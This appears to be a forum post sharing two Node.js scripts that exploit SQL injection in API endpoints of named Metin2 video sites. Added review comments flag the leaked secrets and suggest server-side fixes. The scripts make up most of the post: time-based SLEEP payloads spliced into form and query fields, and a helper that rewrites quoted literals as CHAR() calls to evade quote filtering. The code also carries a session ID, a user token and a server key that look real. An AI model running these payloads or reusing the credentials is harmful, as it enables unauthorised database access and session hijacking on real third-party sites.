Ah shit, ...
For [link hidden by the forum — login required], you can test the injection like this:
JavaScript
- const axios = require('axios');
- const queryString = require('query-string');
- const url = queryString.stringifyUrl({ // Endpoint URL with the query string ?type=popular_channels, built once and reused by exec().
- url: 'https://www.mt2tube.com/api/v1.0',
- query: {
- type: 'popular_channels',
- },
- });
- const axiosInstance = axios.create({ // Shared client: every request made through it carries the Cookie header below.
- headers: {
- Cookie: stringifyCookie({ // stringifyCookie is a function declaration further down; hoisting makes this early call valid.
- PHPSESSID: 'vf34e0d5n066te1tbfv05jjuli', // NOTE(review): session identifier pasted verbatim into a public post; treat it as exposed and invalidate the session.
- user_id: '5340ceee6bc3327b18a4a307b7699accbcd86f8315914037003f6f1a1a5dfc731283fe7ae488f93687', // NOTE(review): looks like a login token; same exposure concern, confirm and rotate.
- }),
- },
- });
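/**
 * Serialises a name-to-value map into a `Cookie` request-header string.
 *
 * Pairs are joined with '; ' in the object's own key order. Names and values
 * are emitted verbatim (no percent-encoding is applied).
 *
 * @param {{ [cookie: string]: string; }} cookies - cookie names mapped to their values
 * @returns {string} the header value, e.g. `a=1; b=2`; the empty string for an empty map
 */
function stringifyCookie(cookies) {
  // Build and return a new string instead of overwriting the `cookies`
  // parameter with a value of a different type.
  return Object.keys(cookies)
    .map((name) => `${name}=${cookies[name]}`)
    .join('; ');
}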
- /**
- * Sends one POST to `url` through `axiosInstance`, with `sql` and `sleep` spliced into the
- * `channels_ids` form field, and reports whether the server answered with HTTP 200.
- *
- * NOTE(review): the `channels_ids` template closes one parenthesis and opens another, so it
- * presumably depends on the server pasting the raw field into a parenthesised SQL list;
- * confirm against the server code. The remediation is server-side: accept only integers
- * for this field and hand them to the query as bound parameters.
- *
- * @param {string} sql - SQL text placed inside `SELECT(...)` in the field value
- * @param {number} sleep - number interpolated into `SLEEP(...)`; defaults to 0
- * @returns {Promise<boolean>} true when the response status is exactly 200, false for any other status or a failed request
- */
- function exec(sql, sleep = 0) {
- return axiosInstance
- .post(
- url,
- queryString.stringify({ // Body is sent as a URL-encoded form string.
- server_key: '1312a113c58715637a94437389326a49', // NOTE(review): credential-like value hard-coded in a shared snippet; confirm whether it is meant to be secret.
- last_count: 1,
- channels_ids: `0) AND (SELECT(${sql}) OR 1) AND SLEEP(${sleep}`,
- })
- )
- .then((response) => response.status === 200)
- .catch(() => false) // Any rejection is collapsed into `false`; the error itself is discarded.
- }
- exec('SELECT views FROM videos WHERE views > 999 OR SLEEP(10) LIMIT 1') // Single call; the `sleep` argument is left at its default of 0.
- .then(result => console.log(result ? 'Completed.' : 'Failed.')); // Prints the boolean outcome reported by exec().
Btw, a long time ago I found a code / SQL injection at Metin2Tube. I told the admin to fix it. He fixed it, and I told him to check the page for security issues. Unfortunately that hasn't happened to this day, lul
So for [link hidden by the forum — login required], you can test the injection like this:
JavaScript
- const axios = require('axios');
- const queryString = require('query-string');
- /**
- * No quotes are allowed.
- *
- * Replaces each single- or double-quoted literal in `sql` with a `CHAR(n, n, ...)` call whose
- * arguments are the character codes of the literal's contents, so those literals no longer
- * contribute quote characters to the returned text.
- *
- * NOTE(review): for defenders this shows that rejecting or stripping quote characters in
- * input does not stop SQL injection; bound parameters and strict typing of the input do.
- *
- * @param {string} sql - SQL text that may contain quoted literals
- * @returns {string} the text with quoted literals rewritten as CHAR(...) calls
- */
- function prepareSql(sql) {
- return sql.replace(/'((?:[^\\]|\\.)*?)'|"((?:[^\\]|\\.)*?)"/gsi, (m, p1, p2) => `CHAR(${Array.from(p1 || p2).map(c => c.charCodeAt(0)).join(', ')})`);
- }
- function exec(sql) { // Sends one GET to the relatedvids endpoint with `sql` embedded in `videoid`; resolves to true or false.
- console.log(`sql: '${sql}'`); // Logs the statement as written, before prepareSql() rewrites its quoted literals.
- sql = prepareSql(sql);
- const url = queryString.stringifyUrl({
- url: 'https://metin2tube.com/api/relatedvids',
- query: {
- videoowner: '',
- videomedia: 1,
- videocategory: 1,
- videoid: `1) AND (SELECT (${sql})` // NOTE(review): presumably the server concatenates videoid into a parenthesised SQL expression (confirm); the fix is to parse it as an integer and bind it as a parameter.
- }
- });
- return axios.get(url).then(() => true).catch(() => false) // true when axios resolves, false when it rejects (a network error or, with axios defaults, a non-2xx status).
- }
- exec(`SELECT '\\'';`).then(() => console.log('Completed.')); // Prints 'Completed.' once the request settles, whether exec() resolved to true or false.